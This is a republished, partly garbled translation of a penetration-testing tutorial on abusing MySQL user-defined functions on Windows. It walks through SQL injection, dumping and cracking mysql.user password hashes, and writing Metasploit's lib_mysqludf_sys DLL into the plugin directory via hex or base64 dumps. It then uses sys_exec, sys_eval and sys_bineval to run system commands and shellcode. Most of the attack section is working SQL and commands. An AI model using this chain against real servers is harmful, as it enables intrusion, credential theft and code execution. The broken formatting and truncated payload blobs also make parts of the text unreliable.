Shulou(Shulou.com)06/03 Report--

This article focuses on "how to use MySQL UDF for penetration testing", interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to use MySQL UDF for penetration testing.

Recently, when I infiltrated a financial institution, I found that they had their own intranet and used MySQL 5.764-bit at the back end. Based on past experience, most of my partners use MSSQL, so this is a very rare scenario to me. I found a SQL injection vulnerability in the web application that allowed me to get my user name and password from mysql.user dump, and I also found that my current permissions allow me to write files to disk. That's what prompted me to write this article. I'd like to share with you tips on injecting UDF libraries into MySQL and getting code execution and shell under Windows. In addition, when I search for related technologies through Google, I also find that there are very few resources on the Internet. Therefore, I also hope that through my sharing, you can have a deeper understanding of this technical point.

To recreate this scenario, I will host the latest MySQL 5.7.21 as my test environment and set the'- secure-file-priv=' parameter to start mysqld server null. This allows me to use union-based injection in the intranet to retrieve the user name and password in the mysql.user table. It is important to remind you that in MySQL version 5. 7 and later, the password column is no longer 'password' but' authentication_string'.

# MySQL 5.6 and belowselect host, user, password from mysql.user;# MySQL 5.7 and aboveselect host, user, authentication_string from mysql.user

Note that if you already have credentials, you can use metasploit's mysql_hashdump.rb helper module to dump MySQL the hash. When I write this post, the script needs to be updated to be compatible with MySQL 5.7.You can check my pull request here.

The host column of user 'osanda' allows connections from 192.168.0.*, which means we can use that user to connect remotely from that IP scope. I cracked the password hash and got the plaintext password.

After logging in to MySQL, I checked the permissions of the current user.

Select * from mysql.user where user = substring_index (user (),'@', 1)

You can see that the user has very high privileges and can read and write files, so we can consider writing UDF DLL libraries to gain the ability to execute code.

What is the UDF library?

UDF represents a user-defined function in MySQL. It's like writing your own functions in DLL and calling them in MySQL. We will use the "lib_mysqludf_sys_64.dll" DLL library, which you can find in the Metasploit framework. You can use UDF libraries based on system architecture, which are located in the Metasploit installation directory "/ usr/share/metasploit-framework/data/exploits/mysql/". Click here to view the download.

First of all, we use'@ version_compile_os' 'and' @ @ version_compile_machine', to get the architecture of the current database and operating system, respectively. The result is as follows: the current system environment is windows 64-bit, and MySQL is also 64-bit.

MySQL [(none)] > select @ @ version_compile_os, @ @ version_compile_machine +-- +-- + | @ @ version_compile_os | @ @ version_compile_machine | +-+ | Win64 | | x86room64 | +-- +-- + MySQL [(none)] > show variables like'% compile%' | +-+-+ | Variable_name | Value | +-+-+ | version_compile_machine | x86room64 | | version_compile_os | Win64 | +- -+

Starting with MySQL 5.0.67, the UDF library must be included in the plugin folder, which we can find using the'@ @ plugin_dir' global variable. This variable can be viewed and edited in the mysql.ini file.

MySQL [(none)] > select @ @ plugin_dir +-+ | @ @ plugin_dir | +-- -- + | D:\ MySQL\ mysql-5.7.21-winx64\ mysql-5.7.21-winx64\ lib\ plugin\ | +- -+ 1 row in set (0.02 sec) MySQL [(none)] > show variables like 'plugin%' +-- + | Variable_name | Value | +- -+-- + | plugin_dir | D:\ MySQL\ mysql-5.7.21-winx64\ mysql-5.7.21-winx64\ lib\ plugin\ | +- -- +

You can change the directory location of plugin through mysqld.

Mysqld.exe-plugin-dir=C:\\ temp\\ plugins\

Another way is to write a new mysql configuration file and pass it to mysqld with the-defaults-file argument.

Mysqld.exe-defaults-file=C:\\ temp\\ my.ini

'The contents of the my.ini' are as follows:

[mysqld] plugin_dir = C:\\ temp\\ plugins\

In versions below MySQL 5.0.67, files must be located in the search directory of the system dynamic linker. The same applies to versions prior to 4.1.25, which can be found in the following documentation.

Starting with MySQL 5.0.67, files must be located in the plugin directory. The directory depends on the value of the plugin_dir system variable. If the value of plugin_dir is empty, the file must be in the search directory of the system dynamic linker before reference 5.0.67.

Starting with MySQL 4.1.25, files must be located in the plugin directory. The directory depends on the value of the plugin_dir system variable. If the value of plugin_dir is empty, the file must be in the search directory of the system dynamic linker before reference 4.1.25.

In the old version, you could upload the DLL file to the following location and create a new UDF function.

@ @ datadir

@ @ basedir\ bin

C:\ windows

C:\ windows\ system

C:\ windows\ system32

Upload binaries

There are many ways to do this. The load_file function supports network paths. If you can copy DLL to a network share, you can load it directly and write it to disk.

Select load_file ('\\ 192.168.0.19\\ network\\ lib_mysqludf_sys_64.dll') into dumpfile "D:\\ MySQL\\ mysql-5.7.21-winx64\\ mysql-5.7.21-winx64\\ lib\\ plugin\\ udf.dll"

Another way is to write the entire DLL file to disk after hexadecimal encoding.

Select hex (load_file'/ usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll') into dumpfile'/ tmp/udf.hex';select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000... Into dump file "D:\ MySQL\\ mysql-5.7.21-winx64\\ mysql-5.7.21-winx64\\ lib\\ plugin\\ udf.dll"

Another way is to create a table and insert binary data into the hexadecimal coding stream. You can use the insert statement or decompose it into multiple parts, and then splice the binary data through the update statement.

Create table temp (data longblob); insert into temp (data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000); update temp set data = concat (data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000); select data from temp into dump file "D:\\ MySQL\\ mysql-5.7.21-winx64\\ mysql-5.7.21-winx64\\ lib\\ plugin\\ udf.dll"

Alternatively, you can load files from the network share directly from disk into the table created above, or use the "load data infile" statement to load them locally. Convert the file to hexadecimal as shown above and decode it as it is written to disk.

Load data infile'\\ 192.168.0.19\\ network\ udf.hex' into table temp fields terminated by'@ OsandaMalith' lines terminated by'@ OsandaMalith' (data); select unhex (data) from temp into dumpfile'D:\\ MySQL\\ mysql-5.7.21-winx64\ mysql-5.7.21-winx64\ lib\\ plugin\\ udf.dll'

The good news here is that starting with MySQL 5.6.1 and MariaDB 10.0.5, new to_base64 and from_base64 functions have been added. If you are good at bypassing SQL and injecting WAF, I believe you are already using these functions (hint: routing query injection).

Select to_base64 (load_file ('/ usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile'/ tmp/udf.b64'

You can edit the base64 file and dump it to the plugin directory in the following ways.

Select from_base64 ("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAzwu3gd6ODs3ejg7N3o4OzafEQs3Wjg7Np8QCzfaODs2nxB7N1o4OzUGX4s3Sjg7N3o4KzW6ODs2nxCrN2o4OzafEWs3Wjg7Np8RGzdqODs2nxErN2o4OzUmljaHejg7MAAAAAAAAAAAAAAAAAAAAAUEUAAGSGBgBwsYNLAAAAAAAAAADwACIgCwIJAAASAAAAFgAAAAAAADQaAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAUAAgAAAAAABQACAAAAAAAAgAAAAAQAADPOAAACAEABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAA5AAAFAgAAQDQAADwAAAAAYAAAsAIAAABQAABoAQAAAAAAAAAAAAAAcAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAREAAAABAAAAASAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAABQsAAAAwAAAADAAAABYAAAAA") into dumpfile "D:\ MySQL\\ mysql-5.7.21-winx64\\ mysql-5.7.21-winx64\\ lib\\ plugin\\ udf.dll"

After that, you can pass the entire file to mysql like this.

Mysql-h292.168.0.30-uosanda-pabc123

< /tmp/udf.b64 你也可以从网络共享写入base64编码文件或使用"快速导入数据（load data infile）"语句在本地加载并通过以下语句dump。 select from_base64(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll';DLL探索 在网上我翻阅了不少的资料，但大多都只介绍了Metasploit内部这个DLL中的'sys_exec'函数。那么除了这个函数之外，其它的函数是否也能为我们所用？通过导出该目录，我发现作者也写了许多其它非常实用的函数。如下所示： sys_exec 该函数将在"系统"函数内传递参数'args->

Args [0]'. You can use it to execute system commands on the target machine.

Installation

Create function sys_exec returns int soname 'udf.dll'

Verification

Select * from mysql.func where name = 'sys_exec' +-+ | name | ret | dl | type | +-+ | sys_exec | 2 | udf.dll | function | +-+- +-+ +

Delete

Drop function sys_exec;sys_eval

This function executes the system command and displays it on the screen through standard output.

Installation

Create function sys_eval returns string soname 'udf.dll'

Verification

Select * from mysql.func where name = 'sys_eval'

Delete

Drop function sys_eval

Example

Select sys_eval ('dir')

Sys_get

This function uses the 'getenv' function to return the value of the system variable.

Installation

Create function sys_get returns string soname 'udf.dll'

Verification

Select * from mysql.func where name = 'sys_get'

Delete

Drop function sys_get

Example

Select sys_get ('longonserver')

Execute Shellcode-sys_bineval

I found a very useful function 'sys_bineval'' in this DLL. This function allocates RWX memory using 'VirtualAlloc'API and copies' args- > args [0]'to the newly allocated memory using 'strcpy'. The buffer is then passed to 'CreateThread'API to generate a new thread.

If we look at 'CreateThread'API, we can see that it uses the' lpParameter' of the 'strcpy' copy buffer as a variable passed to the thread as a pointer.' The function in StartAddress' will directly move 'lpParamter' and call ptr rax, which will change the RIP to our shellcode.

Installation

Create function sys_bineval returns int soname 'udf.dll'

Verification

Select * from mysql.func where name = 'sys_bineval'

Delete

Drop function sys_bineval

Example

However, I did not successfully execute the function on the 64-bit platform, but it executed normally on the 32-bit platform. You can directly open the original binary file or encode it as base64 or hexadecimal and use this function to execute.

Select sys_bineval (from_base64 (load_file ('. / calc.b64'))

I noticed that these external UDF functions did not do proper exception handling in the dismantling code. Therefore, the slightest error in calling these functions can cause the mysqld.exe server to crash.

At this point, I believe you have a deeper understanding of "how to use MySQL UDF for penetration testing". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.